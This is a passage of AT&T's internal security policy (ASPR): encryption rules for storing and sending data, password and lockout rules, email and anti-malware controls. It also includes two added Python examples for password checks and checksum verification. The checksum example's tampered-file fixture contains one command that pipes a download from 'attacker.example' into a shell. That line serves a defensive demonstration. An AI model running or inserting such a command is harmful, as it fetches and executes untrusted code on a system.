  AT&T Proprietary (Internal Use Only): Encryption not required.
  AT&T Proprietary (Restricted):
    Must, where Technically Feasible, store non-transient data encrypted except for systems subject to differing contractual commitments.
    Should store non-transient data encrypted for systems subject to differing contractual commitments.

Location: Supplier Provided Cloud Services
  • Non-AT&T provided Software-as-a-Service (e.g. Box, Cisco Spark, Microsoft OneDrive, SalesForce, Slack)
  - or -
  • Non-AT&T provided Platform-as-a-Service (e.g. Force.com)
  - or -
  • Non-AT&T provided Infrastructure-as-a-Service (e.g. Amazon AWS, Microsoft Azure, Oracle Public Cloud)
  (see ASPR-0431: PS - Partner Security and ASPR-1027: Supplier Provided Cloud Service)
  AT&T Proprietary (Internal Use Only):
    Must store encrypted by the service or on an AT&T system prior to storage in the cloud (compliance is required by 30th April 2018).
    NOTE: Encryption is not required on the AT&T system prior to transmission for storage in the cloud.
  AT&T Proprietary (Restricted):
    Must store encrypted by the service or on an AT&T system prior to storage in the cloud (compliance is required by 30th April 2018).
    NOTE: Encryption is not required on the AT&T system prior to transmission for storage in the cloud.

(Columns: Location; AT&T Proprietary (Secure Restricted); AT&T Proprietary (Sensitive Personal Information))

Location: Systems solely within AT&T controlled space
  AT&T Proprietary (Secure Restricted): Should store non-transient data encrypted.
  AT&T Proprietary (Sensitive Personal Information): Must store non-transient data encrypted.

Location: Portable External Storage Devices (excluding Mobile Computing Devices) or Removable Portable Media
  AT&T Proprietary (Secure Restricted):
    Must not be stored except where there is a business need to transfer data between AT&T locations or storage of backups from official company data centers.
    Where there is a business need then
    • Written approval must be obtained (and retained) from an Officer of AT&T (Level 6 or higher),
    — and —
    • Must store encrypted.
  AT&T Proprietary (Sensitive Personal Information):
    Must not be stored except where there is a business need to transfer data between AT&T locations or storage of backups from official company data centers.
    Where there is a business need then
    • Written approval must be obtained (and retained) from an Officer of AT&T (Level 6 or higher),
    — and —
    • Must store encrypted.

Location: Mobile computing devices
  AT&T Proprietary (Secure Restricted):
    Must not be stored except where there is a business need.
    Where there is a business need then written approval must be obtained (and retained) from an Officer of AT&T (level 6 or higher), and must store non-transient data encrypted.
    If a user receives AT&T Proprietary (Secure Restricted) data in an unsolicited fashion (e.g. by email) and is not compliant with all of the above, then the user must delete the data immediately.
  AT&T Proprietary (Sensitive Personal Information): Must store non-transient data encrypted.

Location: Systems/devices permanently or temporarily outside AT&T Controlled Spaces (excluding Non-AT&T provided file storage services)
  AT&T Proprietary (Secure Restricted):
    Must not be stored except where there is a business need.
    Where there is a business need then written approval must be obtained (and retained) from an Officer of AT&T (Level 6 or higher), and must store non-transient data encrypted.
  AT&T Proprietary (Sensitive Personal Information):
    Must not be stored except where there is a business need.
    Should not be taken outside AT&T controlled space, but if there is an overriding business need to do so then written approval must be obtained (and retained) from an Executive Director (Level 4), and must store non-transient data encrypted.

Location: Supplier Provided Cloud Services
  • Non-AT&T provided Software-as-a-Service (e.g. Box, Cisco Spark, Microsoft OneDrive, SalesForce, Slack)
  - or -
  • Non-AT&T provided Platform-as-a-Service (e.g. Force.com)
  - or -
  • Non-AT&T provided Infrastructure-as-a-Service (e.g. Amazon AWS, Microsoft Azure, Oracle Public Cloud)
  (see ASPR-0431: PS - Partner Security and ASPR-1027: Supplier Provided Cloud Service)
  AT&T Proprietary (Secure Restricted):
    Must not be stored except where there is a business need.
    Where there is a business need:
    • Must store encrypted (compliance is required by 30th April 2018).
    • Should encrypt on an AT&T system prior to storage in the cloud.
    • AT&T should own the encryption key.
    • Written approval must be obtained (and retained) from an Officer of AT&T (level 6 or higher).
  AT&T Proprietary (Sensitive Personal Information):
    Must not be stored except where there is a business need.
    Where there is a business need:
    • Must store encrypted (compliance is required by 30th April 2018).
    • Should encrypt on an AT&T system prior to storage in the cloud.
    • AT&T should own the encryption key.
    • Written approval must be obtained (and retained) from an Executive Director (level 4 or higher).

(Columns: Location; Non-Sensitive Customer Data (When processed by an AT&T service or an AT&T employee or contractor); Sensitive Customer Data (When processed by an AT&T service or an AT&T employee or contractor) — or — Any Customer Data from a Conduit (When processed by an AT&T employee or contractor))

Location: Systems solely within AT&T controlled space
  Non-Sensitive Customer Data:
    Encryption not required.
    Should not be copied from primary sources unless there is a business need.
    Where there is a business need then: Written approval must be obtained (and retained) from an Executive Director (Level 4).
  Sensitive Customer Data / Any Customer Data from a Conduit:
    Must store non-transient data encrypted.
    Should not be copied from primary sources unless there is a business need.
    Where there is a business need then: Written approval must be obtained (and retained) from an Executive Director (Level 4).

Location: Portable External Storage Devices (excluding Mobile Computing Devices) or Removable Portable Media
  Non-Sensitive Customer Data:
    Should not be copied from primary sources and stored on such media unless there is a business need.
    Where there is a business need:
    1. Written approval must be obtained (and retained) from an Executive Director (Level 4).
    2. Must store encrypted, with the exception of:
       a. Media that remains in AT&T controlled space as part of a documented business process
       — or —
       b. Customer data for shipping to customers on electronic media.
  Sensitive Customer Data / Any Customer Data from a Conduit:
    Must not be stored except where there is a business need to transfer data between AT&T locations, storage of backups from official company data centers or ship a customer's data to the customer on electronic media.
    Where there is a business need to:
    1. Transfer data between AT&T locations or storage of backups from official company data centers, then:
       a. Written approval must be obtained (and retained) from an Executive Director (Level 4)
       — and —
       b. Must store encrypted.
    — or —
    2. Ship a customer's data to the customer on electronic media, then:
       a. Must store encrypted.
       — or —
       b. A written liability waiver must be obtained from the customer releasing AT&T from any future liability, reviewed by AT&T Legal, and retained prior to shipping the data to the customer. The liability waiver must note that the customer data comes from a service determined as processing sensitive customer data.

Location: Mobile computing devices
  Non-Sensitive Customer Data:
    Should store non-transient data encrypted.
    Should not be copied from primary sources and stored on such devices unless there is a business need.
    Where there is a business need:
    • Written approval must be obtained (and retained) from an Executive Director (Level 4)
    • Must store encrypted.
  Sensitive Customer Data / Any Customer Data from a Conduit:
    Must store non-transient data encrypted.
    Should not be copied from primary sources and stored on such devices unless there is a business need.
    Where there is a business need:
    • Written approval must be obtained (and retained) from an Executive Director (Level 4)
    • Must store encrypted.

Location: Systems/devices permanently or temporarily outside AT&T Controlled Spaces (excluding Non-AT&T provided file storage services)
  Non-Sensitive Customer Data:
    Must store non-transient data encrypted.
    Should not be copied from primary sources unless there is a business need.
    Where there is a business need:
    • Written approval must be obtained (and retained) from an Executive Director (Level 4)
    • Must store encrypted.
  Sensitive Customer Data / Any Customer Data from a Conduit:
    Must not be stored except where there is a business need.
    Where there is a business need:
    • Written approval must be obtained (and retained) from an Executive Director (Level 4)
    • Must store encrypted.

Location: Supplier Provided Cloud Services
  • Non-AT&T provided Software-as-a-Service (e.g. Box, Cisco Spark, Microsoft OneDrive, SalesForce, Slack)
  - or -
  • Non-AT&T provided Platform-as-a-Service (e.g. Force.com)
  - or -
  • Non-AT&T provided Infrastructure-as-a-Service (e.g. Amazon AWS, Microsoft Azure, Oracle Public Cloud)
  Non-Sensitive Customer Data:
    Must not be stored except where there is a business need.
    Where there is a business need:
    • Must store encrypted (compliance is required by 30th April 2018).
    • Should encrypt on an AT&T system prior to storage in the cloud.
    • AT&T should own the encryption key.
    • Written approval must be obtained (and retained) from an Executive Director (level 4 or higher).
  Sensitive Customer Data / Any Customer Data from a Conduit:
    Must not be stored except where there is a business need.
    Where there is a business need:
    • Must store encrypted (compliance is required by 30th April 2018).
    • Should encrypt on an AT&T system prior to storage in the cloud.
    • AT&T should own the encryption key.
    • Written approval must be obtained (and retained) from an Executive Director (level 4 or higher).

HINT: Please contact your help desk or technical support for assistance in encrypting proprietary information.

KEY POINT: There are many portable devices capable of storing information including USB thumb drives, personal digital assistants and even
digital cameras. Because of their small and transportable nature, they are prone to loss, theft or unauthorized use and access. Any storage of
AT&T Proprietary information on such portable devices must be controlled by AT&T personnel at all times and must be protected in accordance
with ASPR.

(All Employees) – Effective January 1, 2017 all systems must be configured to prevent read or write access to any portable storage such as USB
thumb drives, CDs or DVDs. See ASPR-0222: End User Device Access to External Data Storage and Appendix B.

Transmitting Electronic Information


Content Source: ASPR-0179: Transmission of Electronic Data
The following tables define when AT&T Proprietary information requires encryption when transmitted over networks.
(Columns: Location; AT&T Proprietary (Internal Use Only); AT&T Proprietary (Restricted))

Location: Completely within AT&T controlled facilities and network
  AT&T Proprietary (Internal Use Only): Encryption not required.
  AT&T Proprietary (Restricted):
    Should transmit encrypted.
    Must transmit encrypted all authentication credentials used to access AT&T Proprietary (Sensitive Personal Information) or systems containing AT&T Proprietary (Sensitive Personal Information), with the exception of one-time authentication credentials created in accordance with ASPR-0445: Temporary Authentication Credentials, which should be transmitted encrypted.

Location: Partially or completely outside AT&T controlled facilities and network
  AT&T Proprietary (Internal Use Only): Should transmit encrypted.
  AT&T Proprietary (Restricted):
    If using a dedicated private line or VPN, should transmit encrypted.
    If not using a dedicated private line or VPN, then must transmit encrypted.

Location: The customer's access to their own customer details or customer data
  AT&T Proprietary (Internal Use Only): N/A
  AT&T Proprietary (Restricted): Must transmit encrypted.

Location: Supplier Provided Cloud Services
  • Non-AT&T provided Software-as-a-Service (e.g. Box, Cisco Spark, Microsoft OneDrive, SalesForce, Slack)
  - or -
  • Non-AT&T provided Platform-as-a-Service (e.g. Force.com)
  - or -
  • Non-AT&T provided Infrastructure-as-a-Service (e.g. Amazon AWS, Microsoft Azure, Oracle Public Cloud)
  (see ASPR-0431: PS - Partner Security and ASPR-1027: Supplier Provided Cloud Service)
  AT&T Proprietary (Internal Use Only): Must transmit encrypted.
  AT&T Proprietary (Restricted): Must transmit encrypted.

(Columns: Location; AT&T Proprietary (Secure Restricted); AT&T Proprietary (Sensitive Personal Information))

Location: Completely within AT&T controlled facilities and network
  AT&T Proprietary (Secure Restricted): Must transmit encrypted.
  AT&T Proprietary (Sensitive Personal Information): Must transmit encrypted.

Location: Partially or completely outside AT&T controlled facilities and network
  AT&T Proprietary (Secure Restricted): Must transmit encrypted.
  AT&T Proprietary (Sensitive Personal Information): Must transmit encrypted.

Location: Supplier Provided Cloud Services
  • Non-AT&T provided Software-as-a-Service (e.g. Box, Cisco Spark, Microsoft OneDrive, SalesForce, Slack)
  - or -
  • Non-AT&T provided Platform-as-a-Service (e.g. Force.com)
  - or -
  • Non-AT&T provided Infrastructure-as-a-Service (e.g. Amazon AWS, Microsoft Azure, Oracle Public Cloud)
  (see ASPR-0431: PS - Partner Security and ASPR-1027: Supplier Provided Cloud Service)
  AT&T Proprietary (Secure Restricted): Must transmit encrypted.
  AT&T Proprietary (Sensitive Personal Information): Must transmit encrypted.

(Columns: Location and parties; Non-Sensitive Customer Data (When processed by an AT&T service or an AT&T employee or contractor); Sensitive Customer Data (When processed by an AT&T service or an AT&T employee or contractor) — or — Any Customer Data from a Conduit (When processed by an AT&T employee or contractor))

Location: Completely within AT&T controlled facilities and network (AT&T employees or contractors with a business need — or — Between two Systems under AT&T control)
  Non-Sensitive Customer Data: Encryption not required.
  Sensitive Customer Data / Any Customer Data from a Conduit: Should transmit encrypted.

Location: Partially or completely outside AT&T controlled facilities and network (AT&T employees or contractors with a business need — or — Between two Systems under AT&T control)
  Non-Sensitive Customer Data: Encryption not required, but recommended where technically feasible.
  Sensitive Customer Data / Any Customer Data from a Conduit: Must transmit encrypted.

Location: The customer's access to their own customer details or customer data
  Non-Sensitive Customer Data: Encryption not required, but recommended where technically feasible.
  Sensitive Customer Data / Any Customer Data from a Conduit:
    Should transmit encrypted for Commercial email services provided to AT&T customers.
    Otherwise, must transmit encrypted.

Location: Those explicitly authorized by the customer, other than those in the role of AT&T employees/contractors with a business need
  Non-Sensitive Customer Data: Encryption not required.
  Sensitive Customer Data / Any Customer Data from a Conduit: Encryption not required.

Location: Supplier Provided Cloud Services (AT&T employees/contractors with a business need)
  • Non-AT&T provided Software-as-a-Service (e.g. Box, Cisco Spark, Microsoft OneDrive, SalesForce, Slack)
  - or -
  • Non-AT&T provided Platform-as-a-Service (e.g. Force.com)
  - or -
  • Non-AT&T provided Infrastructure-as-a-Service (e.g. Amazon AWS, Microsoft Azure, Oracle Public Cloud)
  Non-Sensitive Customer Data: Must transmit encrypted.
  Sensitive Customer Data / Any Customer Data from a Conduit: Must transmit encrypted.

AT&T Information: High Level Policy and Requirements
Overview
The ASPR contains both general and detailed standards for the entire company to follow in safeguarding company, customer and employee
information, computers and networks, and the good name of the company.

Responsibilities

Compliance
Content Source: ASPR-0481: Statement of Compliance
Compliance with all applicable ASPR requirements is necessary to protect AT&T's corporate assets, as well as the information and assets of others that
AT&T is obligated to protect. The requirements allow the use, access, or disclosure of such assets only in accordance with AT&T corporate interests and
applicable laws and regulations. Adherence demonstrates a responsible approach by the Company to its fiduciary responsibilities.
Failure to comply with applicable ASPR requirements and/or a legally binding agreement, except where local laws prohibit, can result in a violation of
the AT&T Code of Business Conduct (COBC).

Manager Responsibilities
Content Source: ASPR-0741: Manager Responsibilities
Managers are responsible for confirming the business need when subordinates, or contractors the manager sponsors, request access to AT&T
resources, except where access is granted through an attribute-based access control model (including role-based access control).

Content Source: ASPR-0149: Clean Desk Policy


Managers should periodically (recommend every six months) check that the requirements for use and storage of proprietary information as
described in ASPR-0171: Using and Storing AT&T Proprietary Information - Printed Material; and ASPR-0177: Protecting Electronic Media and
Mobile Devices are adhered to by their direct reports. Where a manager is not able to perform such a review he/she may either delegate the task
to a local manager who is authorized to see that team's data, or may direct members of a work group to perform a self-assessment. Managers
should maintain a record of the dates when the checks are carried out and who carried them out.

User Responsibilities
Content Source: ASPR-0030: User Responsibilities
Users must not only comply with all ASPR requirements, but also any security requirements defined by the teams that support their devices.
Where the support teams install utilities on end-user devices in order to meet the ASPR guidelines, these utilities must not be disabled, or
prevented from functioning.

Security Training
Content Source: ASPR-0039: Security Training
All AT&T employees and contractors must complete security training as established by CSO and/or AT&T Corporate Compliance.

Suspicious Activity
Content Source: ASPR-0474: Security Incidents
Any suspicious or unusual activity, which may indicate an attempt to breach the integrity of AT&T's networks and systems, and/or suspected
misuse of company assets must be reported immediately to the AT&T Computer Security Incident Response Team (ACSIRT).

Reporting Security Flaws


Content Source: ASPR-0015: Security Alerts and Advisories: Reporting Security Flaws
Users who become aware of security flaws in software must report them to whoever provided them with the software or hardware (e.g. technical
support group, external vendor, etc.)

NOTE: Security flaws in software might be techniques that people can use to bypass built-in security such as authentication or timeouts, or ways
to elevate permissions to update data they should not update.

UserID and Password

AT&T Employee Userid — ATTUID


Content Source: ASPR-0043: AT&T Employee Userid — ATTUID
All AT&T employees are assigned a unique and personal userid.

Content Source: ASPR-0046: Group Userids


When business needs require that several individuals share one userid, a group userid must be created, and controlled and monitored by one
responsible employee. This employee must maintain the password of the userid. System or application documentation must identify the
responsible employee.
All group userids must be approved by CSO.

Password Rules
Content Source: ASPR-0062: Password Changes, ASPR-1010: Password Length and Complexity
All users and administrators must comply with the following requirements when selecting passwords:
a. Passwords must be at least eight (8) characters in length.
b. Passwords must include characters from at least two (2) of these groupings: alpha, numeric, and special characters.
 Be cautious of special characters that may have command functions.
c. Passwords must not be the same as the userid with which they are associated.
d. New passwords must not contain a sequence of three (3) or more characters from the previous password.

Passwords must be changed according to the frequencies contained in the table below:

Password or Userid Type: Change Requirement
 Any password, if compromised: Immediately, or as directed by the Chief Security Office (CSO)
 Default passwords: Immediately
 Initial or temporary passwords: At first login
 General Userids, Administrative Userids, or Network Infrastructure: 8-11 characters, every 90 days or sooner; more than 11 characters, every 180 days

KEY POINT: In most cases, password changing requirements are enforced by AT&T systems.

Unsuccessful Login Attempts


Content Source: ASPR-0057: Unsuccessful Login Attempts
HINT: After a maximum of six (6) consecutive unsuccessful attempts to login to a system, the User's ID is automatically disabled for at least 3
minutes.
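The password rules and the lockout rule above are simple enough to encode as checks, and the one that is usually implemented wrongly is rule d (no run of three or more characters carried over from the previous password). The block below is an added example, not AT&T code and not taken from the ASPR: it implements the rules exactly as quoted on this page (8 characters, two of three character groups, not equal to the userid, no reused 3-character run, 90/180-day rotation by length, and six consecutive failures locking the ID for three minutes). Function and class names, the use of epoch seconds for time, and the case-insensitive comparison in the reuse check are this example's own choices.

```python
"""Password-policy and lockout checks for the rules quoted above.

Added example; not AT&T's code. Thresholds are the page's numbers; names,
the seconds-based clock and case-insensitive matching are assumptions made here.
"""
from __future__ import annotations
from dataclasses import dataclass, field

MIN_LENGTH = 8          # rule a
MIN_GROUPS = 2          # rule b: alpha, numeric, special
REUSE_RUN = 3           # rule d: no run of 3+ chars from the previous password
MAX_FAILURES = 6        # ASPR-0057: six consecutive failures ...
LOCKOUT_SECONDS = 180   # ... disable the ID for at least 3 minutes
DAY = 86400


def _character_groups(pw: str) -> int:
    """Count how many of the three groups (alpha, numeric, special) appear in pw."""
    has_alpha = any(c.isalpha() for c in pw)
    has_digit = any(c.isdigit() for c in pw)
    has_special = any(not c.isalnum() for c in pw)
    return int(has_alpha) + int(has_digit) + int(has_special)


def shares_run(new: str, old: str, n: int = REUSE_RUN) -> bool:
    """True if any n consecutive characters of old occur anywhere in new.

    Compared case-insensitively (an assumption; the page does not say)."""
    if not old or len(old) < n:
        return False
    new_l, old_l = new.lower(), old.lower()
    return any(old_l[i:i + n] in new_l for i in range(len(old_l) - n + 1))


def check_password(userid: str, new: str, previous: str | None = None) -> list[str]:
    """Return the violated rules; an empty list means the password is acceptable."""
    problems = []
    if len(new) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if _character_groups(new) < MIN_GROUPS:
        problems.append("needs characters from at least two of alpha/numeric/special")
    if new.lower() == userid.lower():
        problems.append("equals the userid")
    if previous and shares_run(new, previous):
        problems.append(f"reuses a run of {REUSE_RUN}+ characters from the previous password")
    return problems


def max_age_days(pw: str) -> int:
    """Rotation interval from the table: 8-11 characters 90 days, longer 180 days."""
    return 180 if len(pw) > 11 else 90


def is_expired(pw: str, set_on_ts: float, now_ts: float) -> bool:
    return now_ts - set_on_ts >= max_age_days(pw) * DAY


@dataclass
class LoginGuard:
    """Consecutive-failure lockout: the 6th failure disables the ID for 3 minutes."""
    failures: dict = field(default_factory=dict)
    locked_until: dict = field(default_factory=dict)

    def attempt(self, userid: str, credentials_ok: bool, now_ts: float) -> str:
        """Outcome is 'ok', 'denied' (wrong credentials) or 'locked' (ID disabled)."""
        until = self.locked_until.get(userid)
        if until is not None and now_ts < until:
            return "locked"          # even a correct password is refused while locked
        if credentials_ok:
            self.failures[userid] = 0
            return "ok"
        self.failures[userid] = self.failures.get(userid, 0) + 1
        if self.failures[userid] >= MAX_FAILURES:
            self.locked_until[userid] = now_ts + LOCKOUT_SECONDS
            self.failures[userid] = 0
            return "locked"
        return "denied"


if __name__ == "__main__":
    # constructed sample: a password change for userid jd1234
    print(check_password("jd1234", "Tr0ub4dor&4", previous="Tr0ub4dor&3"))
    guard = LoginGuard()
    print([guard.attempt("jd1234", False, 1000.0) for _ in range(MAX_FAILURES)])
```

The reuse check is a substring test over every 3-character window of the old password, so "Tr0ub4dor&4" is rejected after "Tr0ub4dor&3" even though only the last character changed. The guard refuses a correct password while the ID is disabled, which is what stops an attacker from continuing to guess during the lockout window.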

Security on the AT&T Network

Peer-to-Peer File Sharing


Content Source: ASPR-0101: Peer-to-Peer File Sharing
Peer-to-peer file sharing must not be used except when all of the following criteria are met:
a. The intent is to conduct AT&T business,
b. The application is TSS approved,
c. The communication is only across the AT&T Internal Network,
–and-
d. It is not to be used to circumvent security controls.

Wireless Communication with Peripherals


Content Source: ASPR-0102: Wireless Communication with Peripherals
Wireless technologies (e.g. Bluetooth, Infrared) must not be used for communicating between a device and a peripheral unless both:
a. The confidentiality of the communication is guaranteed, and
b. Unauthorized access to the device and the peripheral are prevented.
In addition, all such technologies must be disabled when not in use.

KEY POINT: There are many wireless devices used by consumers including personal digital assistants, wireless headsets for cell phones and
wireless USB adapters for computers. Any connections of these devices to AT&T equipment or networks must be in compliance with ASPR.

Email Security
Content Source: ASPR-0106: Email Security
Administrators and personnel who use an electronic mail system to send or receive AT&T Proprietary information must implement appropriate
security controls to protect incoming and outgoing messages, as follows:
A. The message originator must ensure that it is clearly marked to reflect its proprietary classification.
B. The message originator must ensure that the email ID to which the information is being sent is correct. AT&T personnel should use email
directory searches to verify the recipient's email ID.
C. The recipient of the email message must understand the safeguards associated with the proprietary marking. The originator of the email
message may have to explain the safeguards to the recipient of the email message in advance.
D. If printed, the email message must be protected according to the rules associated with its proprietary marking.
E. The proprietary information must be encrypted in accordance with ASPR-0176: Storage of Electronic Data, ASPR-0179: Transmission of
Electronic Data.
F. AT&T internal mail must not be automatically forwarded out of AT&T's internal network, such as via the Internet, to any other mail
system.
G. AT&T employees and contractors must only use an "att.com" domain email address to conduct AT&T business unless otherwise obligated
to do so on behalf of AT&T through a formal contractual document.
H. AT&T corporate database systems, e.g. WebPhone, GAL or Non Payroll Database, which are used to define the contact details for
personnel performing work on behalf of AT&T must only contain email addresses within the "att.com" domain (e.g. RM-nsp@att.com).
Other email address domains may be used for personnel employed by or affiliated with an External Entity (e.g. business partners, joint
venture partners, subsidiaries, contractors, vendors, suppliers) that is covered by a legal agreement that contains the Supplier
Information Security Requirements (found at: http://cso.att.com/ContractSecurity/Main.html ).

Note: Databases used for other purposes, such as customer/supplier contact, may contain non "att.com" domain addresses.

I. Auto Replies / Out of office messages;


1. May be sent in reply to emails received from internal or external email sources. However, when such functions are used the
originator must ensure that the classification of the data contained does not exceed that appropriate to anyone who might
receive it, and so the reply message must not contain any AT&T Proprietary information. The content of an out of office message
should be limited to providing alternate contact information.
2. May be received for emails sent to internal or external email destinations.
J. Successful "delivery report" messages:
1. May be sent in reply to emails received from internal email sources, but are not permitted in reply to emails received from
external email sources.
2. May be received for emails sent to internal or external email destinations.

K. Unsuccessful "non-delivery report" messages:
1. May be sent in reply to emails received from internal or external email sources.
2. May be received for emails sent to internal or external email destinations.
L. The sender's display name:
1. May be sent in emails destined to internal or external email destinations.
2. May be received for emails sent by internal or external email destinations.
M. AT&T e-mail systems are not to be used to send, forward or reply to chain letters, hoaxes or virus warnings.
N. AT&T e-mail systems are not to be used to distribute executable files (see ASPR-0109 Distribution of Software).

HINT: AT&T routinely and automatically blocks email attachments with certain file extensions. CSO website has a webpage with complete and
current details.

Computer Viruses and Malicious Code


Content Source: ASPR-0116: Computer Viruses and Malicious Code
The essential trustworthiness of the software and systems used to conduct Company business can be adversely affected by viruses and other
malicious code. TSS approved endpoint security software can be found here: http://cso.att.com/AntiVirus/index.html

All supported platforms must use the latest version of the endpoint security software when made available. For advice on what platforms are
supported, contact GET ETO Security or Chief Security Office (CSO) AV teams.

Where the installation of endpoint security software would not be allowed in accordance with vendor support terms (see ASPR-0108: Authorized
Software Use) for that platform, e.g., an appliance or router, then contact GET ETO Security or Chief Security Office (CSO) AV team for direction on
what compensating controls must be used.

Security Analysis
Content Source: ASPR-0018: Security Analysis
Performing security analysis of AT&T networks, computers, applications or services is the responsibility of AT&T. Using external vendors or
consultants to perform security analysis on AT&T computing resources is expressly prohibited unless written approval has been obtained from
AT&T CSO. Regardless of who performs the security analysis, results of any of these tests or analyses are AT&T property, and must be classified as
AT&T Proprietary (Restricted) information (see ASPR-0152: AT&T Proprietary (Restricted)).

Security analysis must take place in accordance with the following tables:

NOTES:
1. See CSO Security Compliance and Vulnerability Management (CSO SCVM) website for further information.
2. Compliance with the following tables is not required until 30th April 2018.

Table 0018a - Applications

Columns: Resource Type; Responsible Org; Source Code; Dynamic Analysis; Penetration Testing

Resource Type: AT&T Developed or Modified Applications, or 3rd Party Applications Developed or Customized for AT&T (operating within an AT&T Controlled Facility)
  BU:
    Source Code: Each code release
    Dynamic Analysis: Each code release or monthly (whichever occurs first)
    Penetration Testing: Annually for Internet Facing and high criticality applications as defined in MOTS (see ASPR-0021: Application Inventory Database of Record)
  CSO:
    Source Code: Will perform compliance validation and oversight.
    Dynamic Analysis: Will perform compliance validation and oversight.
    Penetration Testing: Annually (PCI Internet Facing only)

Resource Type: AT&T Controlled Applications (operating within a Supplier Provided Cloud Service)
  BU:
    Source Code: Each code release
    Dynamic Analysis: Each code release or monthly (whichever occurs first)
    Penetration Testing: Annually for Internet Facing and high criticality applications as defined in MOTS (see ASPR-0021: Application Inventory Database of Record)
  CSO:
    Source Code: Will perform compliance validation and oversight.
    Dynamic Analysis: Will perform compliance validation and oversight.
    Penetration Testing: Annually (PCI Internet Facing only)

Resource Type: 3rd Party Applications Developed or Customized for AT&T (operating within Vendor space)
  BU:
    Source Code, Dynamic Analysis and Penetration Testing: Vendor to provide verification status that vulnerability scanning is part of their standard process. See ASPR-0431: PS - Partner Security.
Table 0018b - Other Resource Types

Columns: Resource Type; Responsible Org; Frequency; Penetration Testing

Resource Type: Databases
  BU:
    Frequency: Conduct vulnerability scans with each code release or monthly (whichever occurs first).
    Penetration Testing: Annually for Internet Facing and high criticality applications as defined in MOTS (see ASPR-0021: Application Inventory Database of Record)
  CSO:
    Frequency: Will perform compliance validation and oversight.
    Penetration Testing: Will perform compliance validation and oversight.

Resource Type: Hosts (via Host Based Testing; see ASPR-0031: Host Based Testing)
  BU:
    Frequency: Weekly configuration/vulnerability check.
    Penetration Testing: Annually for Internet Facing and high criticality applications as defined in MOTS (see ASPR-0021: Application Inventory Database of Record)
  CSO:
    Frequency: Weekly host based testing: 1. using an agent installed on the system, and/or 2. using remote authenticated access.
    Penetration Testing: Annually (PCI Internet Facing only)

Resource Type: Network Connected Devices (Discovery and Vulnerability via Network Based Testing; see ASPR-0022: Network Based Testing)
  BU:
    Frequency: N/A
    Penetration Testing: N/A
  CSO:
    Frequency: 1. Discovery: continuous across all network segments. 2. Vulnerability: weekly network based testing (not using remote authenticated system access).
    Penetration Testing: N/A

See:
 ASPR-0299: Service Realization
 ASPR-0306: Service Realization: Service Test Phase
 Application development, see the Application Security Standards baseline
 ASPR-0422: Application and Data Security: Assessment, Testing, Packaging and Mobile Code Controls for Development of Applications for
Handheld Mobile Systems

Personal Computer Security

Obtaining Files or Software


Content Source: ASPR-0110: Obtaining Files or Software
Where an end user directly obtains or downloads files or software, the end user is responsible for complying with the following requirements;
where a central AT&T authority obtains or downloads the files or software and then disseminates them, that authority is responsible for complying
with the following requirements:
1. All files and software must be obtained from trusted sources,
— and —
2. All files and software must be scanned for viruses and malicious code (see ASPR-0116: Computer Viruses and Malicious Code),
— and —
3. All files and software should be validated using digital signatures where available,
— and —
4. Any binary or executable files obtained from un-trusted sources on the Internet, must be verified to be free of logic bombs or other
malicious code before being used.
See ASPR-0108: Authorized Software Use and ASPR-0643: Purchased Products and Applications.

KEY POINT: Any files obtained from un-trusted sources on the Internet, must be verified to be free of malicious code before being used.
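Requirement 3 above (validate files using digital signatures where available) has an integrity half that is easy to automate: compare the downloaded file against the checksum the trusted source published alongside it. The block below is an added example, not AT&T code and not from the ASPR. It parses the common "sha256sum" list format, compares digests in constant time, and treats a file that is not listed as unverified rather than as passing. It checks integrity only: the checksum list itself must have come over an authenticated channel or carry a signature verified by the publisher's tool (for example gpg --verify), which this block does not do. The installer bytes and the checksum list are constructed for the demonstration.

```python
"""Verify a downloaded file against a published SHA-256 checksum list.

Added example for ASPR-0110's "validate using digital signatures" rule; not AT&T
code. Covers the checksum step only; verifying the signature on the checksum
list is left to the publisher's signing tool. Sample data is constructed here.
"""
from __future__ import annotations
import hashlib
import hmac

HEX_DIGITS = set("0123456789abcdef")


def parse_sha256sums(text: str) -> dict[str, str]:
    """Parse lines of the form '<hex>  <name>' or '<hex> *<name>' (binary-mode marker).

    Blank lines and '#' comments are skipped; a malformed digest is an error rather
    than a silently ignored entry, so a corrupted list cannot pass as 'no entry'."""
    table: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.lstrip(" *")          # drop the separator and the '*' marker
        digest = digest.lower()
        if len(digest) != 64 or any(c not in HEX_DIGITS for c in digest):
            raise ValueError(f"malformed SHA-256 digest for {name!r}")
        table[name] = digest
    return table


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify(name: str, data: bytes, sums: dict[str, str]) -> bool:
    """True only if name is listed and its digest matches (constant-time compare)."""
    expected = sums.get(name)
    if expected is None:
        return False                       # unlisted means unknown, not verified
    return hmac.compare_digest(sha256_of(data), expected)


# Constructed sample: a clean installer, a tampered copy, and the list the
# trusted source would have published for the clean one.
GOOD = b"#!/bin/sh\necho installer v1.0\n"
TAMPERED = b"#!/bin/sh\necho installer v1.0\ncurl http://attacker.example/x | sh\n"
SUMS_TEXT = "# SHA256SUMS published by the vendor\n" + sha256_of(GOOD) + " *installer.sh\n"


if __name__ == "__main__":
    sums = parse_sha256sums(SUMS_TEXT)
    print("good     :", verify("installer.sh", GOOD, sums))      # True
    print("tampered :", verify("installer.sh", TAMPERED, sums))  # False
    print("unlisted :", verify("other.bin", GOOD, sums))         # False
```

A mismatch, a missing entry and a malformed list are three different failures, and the block reports each differently on purpose: only a matching, listed digest is treated as "verified", and a garbled list raises rather than quietly verifying nothing.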

Non-AT&T Owned Software, Hardware and Media


Content Source: ASPR-0113: Non-AT&T Owned Software, Hardware and Media
AT&T owned hardware, software and media should always be used wherever possible.
Personally owned electronic storage media must not be used for anything beyond incidental transfer of AT&T information where the data is
deleted from the media after the transfer is completed.
Non-AT&T owned software and hardware must not be used in support of AT&T business, to connect to AT&T's internal networks or to hold the
confidential, proprietary or trade secret data of AT&T, or such data of any other party, such as a customer or employee, which AT&T is obligated to
protect (this would include AT&T Proprietary data and customer data) except under the following conditions and authorizations:
1. Where a supplier or a Non-Staff Supplementation (NSS) Non-Payroll Worker (NPW) is performing work on behalf of AT&T, by a written
agreement that fully complies with the ASPR requirements referenced within ASPR-0431: PS – Partner Security
— or —
2. For an AT&T employee, contractor, or Staff Supplementation (SS) Non-Payroll Worker (NPW), by an approval from an individual in the
user's Supervisory management hierarchy (retained for audit purposes by both the user and the approving manager) either:
